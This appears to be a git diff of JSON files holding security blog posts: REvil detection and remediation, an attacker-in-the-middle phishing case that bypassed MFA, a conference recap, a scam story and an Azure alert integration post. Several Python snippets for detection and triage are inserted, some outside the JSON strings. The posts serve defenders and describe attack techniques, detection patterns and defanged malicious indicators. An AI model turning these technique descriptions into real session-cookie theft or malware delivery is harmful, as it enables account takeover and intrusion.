REvil campaign? This most recent campaign is similar to activity we saw in fall 2020, where users visit a number of compromised yet legitimate third-party websites and are redirected to a Question & Answer (Q&A) forum instructing them to download a ZIP file that contains a malicious JScript file. It appears as though users weren\u2019t directed to these fake forum posts via phishing emails, but instead through their own Google searches. This suggests that the attackers responsible for this campaign invested considerable effort into boosting these malicious pages higher in Google result rankings. Many of these pages align with themes related to legal topics, while others talk about international defense agreements or even cover letter samples. In short, there\u2019s a wide range of topics being showcased on these various sites. The JScript file, when run, deploys a BEACON stager to the system. So far we\u2019ve seen REvil targeting users in Germany and in the United States. How to detect REvil activity in your own environment There are a few activities you can alert on in an effort to detect REvil activity: Alert when you see wscript.exe or cscript.exe execute a .vbs, .vbscript or .js file from a Windows user profile. If this generates too many false positives, try adding the condition where the wscript.exe or cscript.exe process also initiates an external network connection. Alert when wscript.exe or cscript.exe execute a .vbs, .vbscript or .js file from a Windows user profile and the process spawns a cmd.exe process. Alert when you see Windows PowerShell execute a base64 encoded command and the process initiates an external network connection. 
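However you implement them, those alerting ideas boil down to simple logic over process events. Here's a tool-agnostic sketch; the event field names (process_name, command_line, and so on) are placeholders rather than any particular vendor's schema, so map them onto whatever your EDR or SIEM exposes.

```python
# Tool-agnostic sketch of the alerting ideas above. Field names are placeholders --
# map them onto your EDR or SIEM's process-event schema.
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = re.compile(r"\.(vbs|vbscript|js)\b", re.IGNORECASE)
USER_PROFILE = re.compile(r"c:\\users\\", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"\s-e(nc(odedcommand)?)?\s", re.IGNORECASE)

def matches_revil_heuristics(event):
    name = event.get("process_name", "").lower()
    cmd = event.get("command_line", "")

    # wscript/cscript running a .vbs/.vbscript/.js out of a user profile,
    # tightened with an external connection or a cmd.exe child to cut noise.
    if name in SCRIPT_HOSTS and SCRIPT_EXTS.search(cmd) and USER_PROFILE.search(cmd):
        return bool(event.get("made_external_connection")) or "cmd.exe" in event.get("child_processes", [])

    # PowerShell executing an encoded command and reaching out to the internet.
    if name.endswith("powershell.exe") and ENCODED_FLAG.search(cmd):
        return bool(event.get("made_external_connection"))

    return False
```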
REvil process example How to remediate if you think you\u2019re affected #1: Contain the host(s) Isolate the host in question to remove attacker access. #2: Start the re-image Attempting to manually clean the fileless persistence mechanism used by this campaign may lead to re-infection on startup if not done properly. That\u2019s why re-imaging is critical. #3: Scope the environment for additional infections The PowerShell command executed as part of this activity occurs at the time of initial installation as well as at startup after persistence is established. This means that it\u2019s extremely important to determine when the initial download of the zipped JScript file occurred and compare that to the timestamp associated with the detected PowerShell activity. Network traffic destined for known command and control domains also provides a good way to timeline activity related to this campaign in your environment. If you discover that this infection persisted in your environment for more than a short period of time, it\u2019s possible that attackers already moved laterally within your environment and/or escalated their privileges within your Active Directory Domain. RaaS actors typically wait until they have the privileges necessary to deploy ransomware to a large portion of your environment at once before moving on from the persistent implant portion of the attack lifecycle and actually deploying ransomware. How to protect yourself against a REvil ransomware attack There are actions you can take in your environment today to better protect your org against a REvil ransomware attack: Configure Windows Script Host (WSH) files to open in Notepad Prevent the double-click of evil JavaScript files. Configure JScript (.js, .jse), Windows Scripting Files (.wsf, .wsh) and HTML for application (.hta) files to open with Notepad. By associating these file extensions with Notepad, you mitigate common remote code execution techniques. Pro tip: PowerShell files (.ps1) already open by default in Notepad. Enable PowerShell Constrained Language mode Constrained Language mode mitigates many PowerShell attacks by removing advanced features that these attack tools rely on such as COM access and .Net and Windows API calls. The language mode of a PowerShell session determines which elements can be used in the session. Don\u2019t expose RDP directly to the internet Don\u2019t expose RDP services directly to the internet. Instead, consider putting RDP servers or hosts behind a VPN that\u2019s backed by two-factor authentication (2FA). Create and test backups of data Consider creating and testing backups of data within your org as part of your IT policy. Regularly creating valid backups that aren\u2019t accessible from your production environment will minimize business disruptions while recovering from ransomware attacks or data loss. Want to find out when we share updates from our SOC on attack trend alerts just like this one? Subscribe to our EXE blog to get our latest posts sent directly to your inbox." 
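Postscript for the file-association tip above: if you want to check where a Windows host currently stands, the machine-wide mappings live in the registry. Here's a hedged, read-only sketch (Windows only); note that per-user overrides under HKCU\Software\Classes can shadow what it reports.

```python
# Quick read-only check (Windows only): what runs when someone double-clicks a
# script file? Reads the machine-wide association; per-user overrides under
# HKCU\Software\Classes can shadow these values, so treat this as a starting point.
import winreg

def open_command_for(extension):
    progid = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, extension)  # e.g. "JSFile"
    return winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, progid + r"\shell\open\command")

for extension in (".js", ".jse", ".wsf", ".wsh", ".hta"):
    try:
        command = open_command_for(extension)
    except OSError:
        command = "<no association found>"
    verdict = "OK (opens in Notepad)" if "notepad" in command.lower() else "review: a script host may execute this"
    print(f"{extension:<5} -> {command}  [{verdict}]")
```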
+} \ No newline at end of file diff --git a/attacker-in-the-middle-phishing-how-attackers-bypass-mfa.json b/attacker-in-the-middle-phishing-how-attackers-bypass-mfa.json new file mode 100644 index 0000000000000000000000000000000000000000..e80464739e93f41d1716dfe90bb7d825610978f7 --- /dev/null +++ b/attacker-in-the-middle-phishing-how-attackers-bypass-mfa.json @@ -0,0 +1,6 @@ +{ + "title": "Attacker-in-the-middle phishing: how attackers bypass MFA", + "url": "https://expel.com/blog/attacker-in-the-middle-phishing-how-attackers-bypass-mfa/", + "date": "Nov 9, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Attacker-in-the-middle phishing: how attackers bypass MFA Security operations \u00b7 4 MIN READ \u00b7 ANDREW BENTLE \u00b7 NOV 9, 2022 \u00b7 TAGS: MDR TL;DR: Credential phishing is an established attack mode, but multi-factor authentication (MFA) made it much harder on hackers. A new tactic\u2013called \u201cattacker-in-the-middle\u201d\u2013can be effective at end-running MFA defenses. This case examines a recent AitM attack on one of our customers and provides useful advice on how to detect it in your own environment. Credential phishing is nothing new\u2013fooling users into giving away their logins and passwords has been hackers\u2019 bread and butter forever. But until recently the effects of credential phishing could be mitigated by using multi-factor authentication. The attacker might get a password, but the second factor is a lot more difficult. Also not new: attackers finding techniques to bypass security measures. One popular way around MFA is known as attacker-in-the-middle (AitM), where the user is tricked into accepting a bogus MFA prompt. What happened? AitM techniques look identical to regular credential phishing at first. Typically, an email directs the user to a fake login page, which steals credentials when the user attempts to sign in. With normal credential phishing, this fake login page has served its purpose\u2013it stores the credentials and the attacker will attempt to use them at a later time. AitM phishing does something different, though; it automatically proxies credentials to the real login page, and if the account requires MFA users get prompted. When they complete the MFA, the web page completes the login session and steals the session cookie. As long as the cookie is active, the attacker now has a session under the victim\u2019s account. Our SOC recently saw this technique used to bypass MFA and detection in a customer\u2019s environment. The attackers harvested a user\u2019s credentials and login session into their organization\u2019s Microsoft 365 portal using AitM techniques. The attacker evaded detection for 24 days until a suspicious Outlook rule was made in the compromised user\u2019s inbox. Our analysts identified the source IP as a hosting provider and noticed that no login events were seen from the IP address. They followed the related session ID to its earliest date and found that the session originated from another IP address, 137[.]220[.]38[.]57, nearly a month before. This address is related to a hosting provider (Vultr Holdings) and was anomalous for the user account. But something stranger was going on: not only was MFA satisfied from this login, but it was also supported by the Active Directory (AD) agent on the user\u2019s host. This didn\u2019t make sense\u2013how could a login from a random hosting provider IP address use the AD agent tied to the user\u2019s managed host? 
This is something we might see when a user logs in while using a VPN or proxy, but our analyst\u2019s OSINT research and Expel\u2019s automatic IP enrichment didn\u2019t connect this address with a VPN provider, so we kept digging. We checked logs from their Palo Alto firewall and DNS requests from the host in Darktrace and found DNS requests to rnechcollc[.]com with DNS A records pointing to 137[.]220[.]38[.]57, the same IP the first login was from. The rnechcollc[.]com site hosted an AitM credential harvesting page that proxied the credentials (and even the AD agent authentication from the user\u2019s on-premises host through the Vultr Holdings infrastructure and onto the organization\u2019s Microsoft 365 portal). The page then recorded the session cookie and the attacker continued the active session from a VPN provider for the next 24 days. Confirming AitM in your environment AitM can be tricky to confirm, especially without network logs. But there are a few ways to investigate if a compromise originated from an AITM credential harvesting page. Investigating using only cloud logs: this is the worst-case scenario. All you have are the logs from the cloud providers, be it Okta, Microsoft 365, or any number of other platforms, and the goal will be to determine the initial login IP address by following the session ID back to its earliest point. The initial login will likely, but not necessarily, be from an IP address associated with a hosting provider. Check passive DNS entries associated with the IP address (VirusTotal and PassiveTotal are good tools for this). Check the reputation on the recent DNS entries related to the IP address through OSINT\u2013it may be a known indicator of AitM, as was the case with the rnechcollc[.]com domain. Investigating using network and cloud logs: like the above method, you\u2019ll need to identify the initial login IP address through cloud logs. Follow the session ID back to the initial login and take note of the IP address. Check your firewall logs for URLs associated with the IP address. Confirming connections from within your environment to phishing domains associated with the initial login IP address is a strong indicator of AitM methodology. Investigating using EDR and cloud logs: again, identify the initial login IP address through the cloud logs. Follow the session ID back to the initial login and take note of the IP address for the initial login. Check EDR logs for network connections to the IP address. Some EDRs, like CrowdStrike and Defender for Endpoint, will record domain names related to IP connections. Confirming connections from within your environment to phishing domains associated with the initial login IP address is a strong indicator of AitM methodology. Things you can do to keep your org safe Don\u2019t discount the effectiveness of MFA\u2013 still one of the single most effective security tools that can be implemented in your organization. While AitM can bypass MFA, it represents a small portion of the credential phishing we\u2019ve seen in the wild to date. Consider implementing policies to shorten the time that session tokens can remain active; if attackers lose their sessions, they\u2019ll need to re-phish the user to get it back, or at least get them to accept another MFA prompt. Implement conditional access policies to prevent logins from unwanted countries, noncompliant devices, or untrusted IP spaces. 
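To make the "follow the session ID back to its earliest point" step concrete, here's a minimal sketch that works on sign-in records you've already exported; the field names (session_id, timestamp, ip) are placeholders since every provider labels these differently, and the sample records are illustrative rather than the real logs from this case.

```python
# Minimal sketch of "follow the session ID back to its earliest login" over
# exported sign-in records. Field names are placeholders -- rename them to match
# your provider's sign-in logs. Sample data is illustrative, not the real case.
from datetime import datetime

def earliest_login_for_session(records, session_id):
    session_events = [r for r in records if r.get("session_id") == session_id]
    if not session_events:
        return None
    return min(session_events, key=lambda r: datetime.fromisoformat(r["timestamp"]))

records = [
    {"session_id": "abc123", "timestamp": "2022-09-14T02:11:09", "ip": "137[.]220[.]38[.]57"},
    {"session_id": "abc123", "timestamp": "2022-10-08T15:42:51", "ip": "203.0.113.77"},
]

# The earliest event's IP is the one to pivot on (passive DNS, firewall, EDR lookups).
print(earliest_login_for_session(records, "abc123"))
```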
Additionally, services like our Managed Phishing can identify malicious credential harvesting emails and inform your team of campaigns in your organization and help block attacks before they succeed." +} \ No newline at end of file diff --git a/back-in-black-hat-black-hat-usa-2022day-1-recap.json b/back-in-black-hat-black-hat-usa-2022day-1-recap.json new file mode 100644 index 0000000000000000000000000000000000000000..b090fb8ce92dd93242671deaf391b23662001823 --- /dev/null +++ b/back-in-black-hat-black-hat-usa-2022day-1-recap.json @@ -0,0 +1,6 @@ +{ + "title": "Back in Black (Hat): Black Hat USA 2022\u30fcDay 1 Recap", + "url": "https://expel.com/blog/black-hat-usa-2022-day-1-recap/", + "date": "Aug 11, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Back in Black (Hat): Black Hat USA 2022\u30fcDay 1 Recap Expel insider \u00b7 4 MIN READ \u00b7 ANDY RODGER \u00b7 AUG 11, 2022 \u00b7 TAGS: Company news Black Hat is more than a collection of successful events held around the world; it\u2019s a community. And if you needed a reminder of that fact, Black Hat USA 2022 will shake those cobwebs free! While Black Hat did hold its 2021 event at Mandalay Bay in Las Vegas, this year brings more people, more exhibitors, and more energy. From the moment Jeff Moss, founder of Black Hat, took the stage during the first keynote, community has been a common thread throughout the presentations. Moss kicked things off noting that 2022 marks the 25th year of Black Hat USA, and brought the crowd back in time to the conference\u2019s humble origins. At that time, Moss simply reached out to folks in his network to see if they\u2019d want to speak. (Did you know that he considered calling the event \u201cThe Network Security Conference\u201d?) Over the last quarter-century, the community of security practitioners has grown right alongside the expanding threat landscape. Until recently, Moss had thought there were three \u201cteams\u201d when it came to cybersecurity: Team Rule of Law, Team Undecided, and Team Authoritarian. Some teams were following the rules, others were limiting access to information, and there were even a few more somewhere in the middle. But now he sees a new team: a community of super-empowered individuals and organizations. These were people much like the attendees of Black Hat, who take action to right the wrongs in the world. For example, Moss noted how some companies simply stopped doing business with Russian companies in the wake of the Ukraine invasion. Some turned off access by Russian companies to their services and others shut down their websites. He used this example to remind attendees that this community has a significant influence in the world. Following Moss was Chris Krebs of the Krebs Stamos Group, and former director of the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA). Krebs spoke about his time \u201cwandering the wilderness\u201d over the past few years, and talking to people in and outside the U.S. across a range of roles about their security challenges and concerns. He kept hearing three questions: Why is it so bad right now? What do you mean it\u2019s going to get worse? What can we do about it? These aren\u2019t easy questions to answer, but he sees the solution in this community of people who have the ability to make positive changes based on its principles. 
Krebs covered a lot of ground during his roughly 45 minutes on stage, but if there was a single takeaway, it\u2019s that he holds a lot of hope for cybersecurity and its role in improving the world. Black Hat explores those huge macro issues, but it also looks at smaller ones, too\u2014the ones that practitioners face day-in and day-out to better protect their organizations. Kyle Tobener led a session on taking a \u201charm reduction\u201d approach to cybersecurity best practices. Did you know that most organizations\u2019 security teams employ a \u201cuse reduction\u201d approach to security best practices? To quote the Five Man Electrical Band song \u201cSigns\u201d: Do this, don\u2019t do that, can\u2019t you read the signs? Tobener argued that simply telling people what to do isn\u2019t effective. In fact, he shared research that showed how this approach can have the opposite effect. He instead advocates for harm reduction, a commonly used approach in healthcare. Harm reduction offers a set of practical strategies and ideas aimed at reducing the negative consequences associated with various human behaviors. It focuses on the outcomes, not the original behaviors. His advice? Remove \u201cdon\u2019t do that\u201d from your vocabulary. Replace it with, \u201cTry not to do that, but if you do, then here are some ways to be safe.\u201d Adam Shostack of Shostack and Associates took the stage virtually in his session titled, \u201cA Fully Trained Jedi You Are Not.\u201d Shostack pointed out that while the Star Wars movies usually focused on the Jedi and their contribution to the rebellion, non-Jedi characters made huge contributions. He emphasized that the field of cybersecurity needs people of all different skill sets and experience levels, and the field isn\u2019t limited to Jedi-level cybersecurity masters. Instead he shared that a mix of more targeted training and education combined with an effort to \u201cshift left\u201d (incorporating security into the development process) can solve a lot of cybersecurity issues and better support developers and security personnel alike. After all, it takes more than Jedi knights for a successful rebellion. Burnout can have a major impact on cybersecurity professionals. Stacy Thayer, Ph.D., knows this all too well, and shared her knowledge on the topic in her session, \u201cTrying to be Everything to Everyone: Let\u2019s Talk About Burnout.\u201d A number of factors contribute to burnout in cybersecurity. Dr. Thayer named a few: High levels of mental workload Anticipating cyber-attacks A shortage in staffing and an increase in workload A struggle to find one\u2019s place within the organization Work is often not appreciated in the organization Dr. Thayer says that the usual advice for dealing with burnout is completely ineffective. Take a vacation? Sure! I\u2019ll just have more work waiting for me when I get back. Go to the gym? Okay, I feel like absolute garbage but sure let\u2019s get on the treadmill! Stop caring so much? Not possible! According to Dr. Thayer, the more that you learn about yourself and your relationship with burnout and your hidden triggers, the better you\u2019ll be at managing it. These are just a few of the topics that presenters covered on day one of the event. Presenters and attendees shared so much more in sessions and on the business hall floor, but if there\u2019s anything that\u2019s obvious about Black Hat USA 2022, it\u2019s that the community here is alive and well, and poised for great things." 
+} \ No newline at end of file diff --git a/bec-and-a-visionary-scam.json b/bec-and-a-visionary-scam.json new file mode 100644 index 0000000000000000000000000000000000000000..09eb4b48075cf40f01427670001f96c23dfb1670 --- /dev/null +++ b/bec-and-a-visionary-scam.json @@ -0,0 +1,6 @@ +{ + "title": "BEC and a \u201cVisionary\u201d scam", + "url": "https://expel.com/blog/bec-and-a-visionary-scam/", + "date": "Jan 10, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG BEC and a \u201cVisionary\u201d scam Tips \u00b7 2 MIN READ \u00b7 SHARON BURTON \u00b7 JAN 10, 2023 \u00b7 TAGS: MDR What does business email compromise (BEC) have to do with the vanity anthology scam? \u201cTo be part of this exciting project, all you have to do is pay $700 by Jan 1!\u201d I\u2019m a writer. I\u2019m also a woman in tech. When I saw the call for writers in a Reddit channel, looking for women in tech to write an essay about their career for an upcoming book, I was interested. Very interested. I filled out the Google form. On December 22, I got a group email announcing a project meeting at 6pm that day. A little short notice and the message didn\u2019t indicate the time zone, but OK. Responding back to the group, I clarified the time zone and decided I could attend. We met on Google Teams. The woman running the meeting seemed uncertain how to work a virtual meeting, which seemed strange because she billed herself as the chief information officer (CIO) of a large organization and, well, it\u2019s 2022. \u201cWe\u2019re always learning!\u201d she announced to the 20 or so women as she struggled to get the video and screen share to work. She devoted the first 15 minutes of the presentation to her professional background, which demonstrated that she was a \u201cVisionary.\u201d She even referred to herself that way on the typo-ridden slides. Visionary, upper case. She covered the many benefits of the book project for this select group. Visibility in our profession, authority, marketing, inspiration, you can\u2019t be what you can\u2019t see. Our stories would inspire generations. Generations. By the time she got to the part where we needed to give her $700 nonrefundable dollars by Jan 1st to be included in this inspiring project\u30fcor $100 now and three easy payments!\u30fcI knew we were in the middle of a scam. Specifically, the vanity anthology scam . Most professional writer organization websites cover it in detail. Different con, same rules So why should this story interest cybersecurity people? I\u2019m fortunate to work for a security company. When this scam presented itself, I\u2019d just completed our annual internal security training, and was hyper-vigilant about everything, so I saw this swindle for what it was. Because we\u2019re assaulted by an array of ad, marketing, economic, and partisan pitches every day, we\u2019ve evolved pretty good BS detectors. But scammers are evolving too. In this case, the Visionary employed tactics very similar to what we commonly see in BEC scams. Sense of urgency: the first meeting happened just as most people were starting their holiday break, with all the bustle that goes with it. We were given about six hours notice of the meeting. Payment was due in a week. This was all very fast during a time of year where people are already overloaded with commitments and tasks. Typos and other language issues: writers are especially sensitive to typos and dropped words because, well, words are our air. The slides had typos and missing words. Not what I expect of a CIO. 
Uncertainty in using basic tech: the Visionary didn\u2019t know how to share her screen initially. In 2022. After two years of remote pandemic work. Additionally, she was a CIO. A basic familiarity with simple conferencing and presentation is expected. And this was for women in tech, so technological ability should be inherent. Person of authority: She used her r\u00e9sum\u00e9 to assert credibility and emphasized how important the Visionary is in the world of tech. Too good to be true: being included in this project would enhance our careers and inspire generations. She said the volume would be an Amazon Best Seller. That\u2019s a lot for any book, much less one that\u2019s essentially self-published. In the end, the message is that people are people and bad guys are bad guys. The lessons we learn from \u201creal life\u201d apply to the cyber world, and vice versa. My awareness of BEC tactics helped me sniff out the Visionary\u2019s grift. Take your sensitivity to the iffy product and service claims you encounter in everyday life with you when you log in. And maybe that\u2019s how we inspire generations." +} \ No newline at end of file diff --git a/behind-the-scenes-building-azure-integrations-for-asc-alerts.json b/behind-the-scenes-building-azure-integrations-for-asc-alerts.json new file mode 100644 index 0000000000000000000000000000000000000000..a777cb108f09e83777cdc9e434d3c624e8d2a041 --- /dev/null +++ b/behind-the-scenes-building-azure-integrations-for-asc-alerts.json @@ -0,0 +1,6 @@ +{ + "title": "Behind the scenes: Building Azure integrations for ASC alerts", + "url": "https://expel.com/blog/building-azure-integrations-asc-alerts/", + "date": "Feb 9, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Behind the scenes: Building Azure integrations for ASC alerts Engineering \u00b7 12 MIN READ \u00b7 MATTHEW KRACHT \u00b7 FEB 9, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools If you\u2019ve read the Azure Guidebook: Building a detection and response strategy , you learned that we\u2019ve built our own detections and response procedures here at Expel. Missed the guidebook? Download it here But what we didn\u2019t share in that guidebook is how we figured a lot of those things out. Anytime you learned some lessons the hard way, it makes for a long story; which is exactly what I\u2019m sharing with you here. This story begins with our need to replace a third-party tool we were using to pull logs from various cloud providers. Building it ourselves gave Expel new access to data, improved monitoring and ended up allowing us to update our entire detection strategy for Azure Security Center (ASC) alerts and Azure in general. Over the years that third-party application started to creak and groan under the pressure of our needs. Something needed to change. Let\u2019s connect That\u2019s where I came in. (Hi! I\u2019m Matt and I\u2019m a senior software engineer on Expel\u2019s Device Integrations [DI] team.) Building an integration isn\u2019t a simple or linear process. It\u2019s why we warned Azure guidebook readers to go into the process with eyes wide open. It\u2019s also why we harp on the importance of team communication. I\u2019ll walk you through how we built an integration on top of Azure signal to help our analysts do their jobs effectively and share some lessons learned along the way. Finding the right signal At Expel, building an integration is a collaborative effort. 
The DI team works with the Detection and Response (D&R) team and the SOC to identify sources of signal and additional data to include in our alerts. Early on in the process the DI and D&R teams evaluate the technology and to decide which security signals and raw events are accessible. For Azure, all security signals revolve around ASC. Once we decided on using ASC as our primary alert source, I got to work building out the data pipeline. D&R got to work generating sample alerts within our test environment. Before long we had a POC working that was generating ASC alerts within the Expel Workbench\u2122. If you don\u2019t already know, ASC provides unified security management across all Azure resources as well as a single pane of glass for reviewing security posture and real-time alerts. It\u2019s one of the primary sources of alerts across Microsoft\u2019s security solutions. But I still had to figure out the best way to access the data. The good part for Expel was that there are a lot of ways to access ASC alerts; the challenging part is that, well, there are a lot of ways to access ASC alerts. In the end, we went through three different approaches for accessing these alerts \u2013 each with their pros and cons: Microsoft Graph Security API Azure Log Analytics API Azure Management API When we began development of our Azure integration, the Security API was a relatively new offering within Microsoft Graph. It\u2019s intended to operate as an intermediary service between all Microsoft Security Providers and provides a common schema. Microsoft Graph Security API presents two advantages for Expel: The single point of contact for all Microsoft Security alerts allows us to easily adapt and expand our monitoring services as our customers\u2019 needs and tech stack change without requiring our customers to enable us with new permissions or API keys. The common alert schema of the Security API means we only have to adapt one schema to Expel\u2019s alert schema rather than one schema per Microsoft product offering. We already used Microsoft Graph Security API for our Azure Sentinel integration so we were poised to take advantage of the extensibility of the API by simply adding ASC to the types of alerts we were retrieving, or so we thought. Our SOC analysts walked us through comparisons between ASC alerts in the Expel Workbench\u2122 and those same alerts within the ASC console. It quickly became apparent that the data we retrieved from Graph Security API were missing key fields. We had previously used Azure Log Analytics (ALA) to enrich alerts for our Azure Sentinel integration and thought we might be able to do the same for ASC. I worked with the analysts to find different sources of data so we could fill in those data gaps from the Graph Security API. With this approach, we could find almost all of the alert details not provided by the Graph Security API. The downside and eventual death knell to this approach was that ASC alerts by default are not forwarded to ALA. Forwarding ASC alerts would require extra configuration steps for our customers as well as the potential for increased ALA costs. The following chart gives a comparison of what ASC fields were found via each API for a single ASC alert for anomalous data exfiltration. Note that each ASC alert type will have different fields but this chart follows closely with our general experience of data availability across these APIs. 
A table showing, for anomalous activity related to storage blobs, what fields in the alert are or aren\u2019t present based on how you access the alert As the saying goes: when one Azure door closes another always opens. We couldn\u2019t get the fields we needed from the Graph Security API and we couldn\u2019t reliably find those fields within Azure Log Analytics, but we still had Azure Management API to welcome us with open arms. The ASC console uses Azure Management API so we knew we could get data parity using that API. The reason we avoided it initially was that the normalization would require a lot more effort. Each alert type had its own custom fields (see properties.ExtendedProperties field ) and there wasn\u2019t a set schema for these fields. Fortunately, we had enough examples of these alerts and could use those examples to drive our normalization of Azure alerts. In the end, data parity and SOC efficiency are a higher priority for us than some upfront normalization pain, so we went down the Azure Management API route (pun intended). Scaling our SOC If you\u2019ve ever worked with ASC, you probably also know that managing the alerts can feel a little overwhelming. Most of the alerts are based around detecting anomalous behavior or events (like unusual logins or unusual amounts of data extracted). Note that these alerts are generated from different Azure subsystems or resources, so as your environment changes, so do the types of alerts you\u2019ll see. Microsoft is also constantly improving and updating these alerts so you might also find yourself handling \u201cpreview\u201d alerts. And how do I know all this? I didn\u2019t until we started to scale up our POC integration. As soon as our analysts started seeing ASC alerts coming in Expel Workbench\u2122, we immediately got feedback around the lack of context available in the alert. Who is the \u201csomeone\u201d that extracted data from the storage account? What are their usual interactions with that storage account? What other user activity was there outside of Azure Storage? These are all questions that our analysts would need to answer in order to act. The example below shows what little context we had around the ASC alert. Preview alert with missing storage operation data (ex. Extracted Blob Size) Without context, our analysts will pivot to the source technology to look for additional fields to help them make a decision. In this case, they log in to the Azure portal to get more info about the alert. This experience isn\u2019t ideal for our analysts. As a side note, pivots to console (when an analyst leaves Expel Workbench\u2122 to get more details on an alert) is a monthly metric we present to the whole executive team. We track how many times a day, week and month analysts are pivoting (per each vendor technology we support) because it\u2019s an easy indicator that there\u2019s room for improvement. My team works hard to provide our analysts with the information they need to quickly make good decisions and take action, rather than spending their time doing mundane tasks like logging into another portal. Any DI team member will tell you that their worst fear is writing an integration that creates extra work for (read as: annoys) the SOC. But most importantly, an efficient SOC helps us support more customers \u2013 and provide better service. For Azure in particular this meant adjusting the noise inherent in having large amounts of alert types and also adding more context around the anomaly-based alerts. 
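If you want to kick the tires on that same data source, the sketch below pulls ASC alerts straight from the Azure Management API. To be clear, this is not our integration code, just a minimal Python example using the azure-identity and requests packages; the api-version string is an assumption, so check Microsoft's current REST reference for the Microsoft.Security alerts list operation before relying on it.

import requests
from azure.identity import DefaultAzureCredential

SUBSCRIPTION_ID = "<your-subscription-id>"  # placeholder
API_VERSION = "2022-01-01"  # assumption: use whatever version the Alerts API currently documents

def list_asc_alerts(subscription_id):
    """List Security Center (Defender for Cloud) alerts for a subscription
    via the Azure Management API, following nextLink pagination."""
    credential = DefaultAzureCredential()
    token = credential.get_token("https://management.azure.com/.default").token
    headers = {"Authorization": f"Bearer {token}"}

    url = (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Security/alerts?api-version={API_VERSION}"
    )
    alerts = []
    while url:
        resp = requests.get(url, headers=headers, timeout=30)
        resp.raise_for_status()
        body = resp.json()
        alerts.extend(body.get("value", []))
        url = body.get("nextLink")  # follow pagination until exhausted
    return alerts

if __name__ == "__main__":
    for alert in list_asc_alerts(SUBSCRIPTION_ID):
        props = alert.get("properties", {})
        # The extendedProperties bag (casing varies by API version) is where
        # each alert type's custom fields live.
        print(props.get("alertDisplayName"), props.get("extendedProperties", {}))

Those per-alert-type extended properties are exactly why the normalization work mentioned above took some effort.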
Reducing the noise We continuously work to improve the signal of alerts with all of our integrations. ASC, however, was difficult because of the outsized impact configurations have on the variety of alerts you get. For instance, ASC alerts are not generated unless a paid service called Azure Defender is enabled. Azure Defender can be enabled per Azure subscription, per resource type such as Azure Defender for Servers and, in some cases, per individual resources. The configuration of Azure Defender along with the different underlying resources being monitored created a lot of variance in the alerts. As we transitioned from our test Azure environment to real cloud environments, we quickly found this out. Our D&R team generated plenty of ASC alerts but in a live environment we received \u201cpreview\u201d (i.e. beta) alerts, duplicate alerts from Azure AD Identity Protection or Microsoft Cloud App Security along with alerts from Azure resources that we couldn\u2019t set up in our environment. I was able to deduplicate the ASC alerts from other Azure Security Providers (one of the pros of the Security Graph API is that it will do this for you). The D&R team was able to update detections so that we can ignore known low-fidelity alert types and preview alerts. But, even with all of these improvements, we can still get new alert types. As with any tuning effort, the work is ongoing. But we at least solved the known issues. Adding moar context By far the biggest challenge with our ASC integration was getting enough context around an alert so that our analyst could quickly understand the cause of the alert and make triage decisions. After iterating over all three REST APIs to address the data gaps, we eventually got to data parity between Expel Workbench\u2122 and ASC\u2019s console. However, our analysts still didn\u2019t have the context they needed to understand ASC alerts based around anomaly detection. Enter the D&R team. They took the lead on deciphering not only the breadth of alerts ASC generated but also, with the help of our SOC analysts, determined what types of log data were needed to understand each of these alerts. For instance, when we got an ASC alert warning of \u201can unusual amount of data was extracted from a storage account,\u201d D&R built automation in the Expel Workbench\u2122 that uses platform log data to show analysts exactly what the user\u2019s \u201cusual\u201d actions were. Helpful; right? You can see an example below. Example of automated decision support for an ASC alert in Expel Workbench\u2122 That not only bridged the context gap of the ASC alerts but also helped provide a framework around how our analysts triage ASC alerts. And as a bonus it didn\u2019t require them to perform any additional manual steps or pivot into the Azure portal. Is this thing on? Finding the right alert signal and making sure our SOC can triage that signal efficiently are the bread and butter of any integration. However, getting those right doesn\u2019t necessarily mean we\u2019ve created a great integration. Alongside these priorities, we\u2019re focused on operations aspects of the integration: creating a good onboarding experience, ensuring we have optimal visibility (health monitoring) and reducing storage costs. Improving visibility When building the Azure integration, we added plenty of metrics to help us profile each environment. 
Some technologies we integrate with have a fairly narrow range of configuration options but when it comes to monitoring an entire cloud environment that range becomes very large, very fast. As we onboarded customers, we were not only looking at performance metrics but also monitoring subscription totals, resource totals and configurations of each resource. Example customer Azure Subscription totals with Azure Defender configuration settings The image above shows a sampling of a few of our Azure customers, the number of subscriptions we\u2019re actively monitoring and the various Azure Defender configuration settings we detected. You can see there\u2019s a broad number of total subscriptions, and Azure Defender is in various status across the customer and subscriptions. We knew these metrics would help us provide insight to customers on how to maximize our visibility; we just didn\u2019t realize how quickly that was going to occur. Right away we started catching misconfigurations \u2013 disabled logs, Azure Defender not being enabled for any resources, missing subscriptions, etc. We could do as much alert tuning or detection writing as we wanted but without the proper visibility it wouldn\u2019t be much use. Example Expel Workbench\u2122 warning of a potential device misconfiguration You might be noticing a theme: the importance of feedback. And our feedback loop doesn\u2019t just include our internal teams. Ensuring our customers are on the same page and can share their thoughts is critical to making sure we\u2019re doing our job well. So, as we onboarded customers to the integration, our Customer Success team jumped in to work with customers to find ways to improve their configuration. They then ensured each of these customers understood the way our Azure monitoring works and the value of these configuration changes. As the Customer Success team worked, the Turn on and Monitoring team (this is Expel\u2019s internal name for our feature team focused on making onboarding simple, intuitive and scalable along with proactively detecting problems with the fleet of onboarded devices Expel integrates with) used this feedback to build out a way for us to provide automatic notifications for common configuration issues. Example Ruxie notification for a misconfigured Azure Expel Workbench\u2122 device Did you forget to provide access for us to monitor that subscription? No problem. We automatically detect that and provide you a notification along with steps to fix the issue within minutes of creating the Azure device in Workbench\u2122. Keeping costs in check There are design decisions which have very real implications toward cost as you build out integrations with an IaaS provider. Azure was no different. Requiring customers to enable Azure Defender increases their Azure bill. Requiring customers to forward resource logs to Azure Log Analytics increases their Azure bill. If we only integrate with Azure Sentinel, that increases our customer\u2019s Azure bill. And so on\u2026 When it comes to these decisions, we lean towards reducing direct cost to customers. We\u2019ve already discussed how important log data is for providing context around ASC alerts. 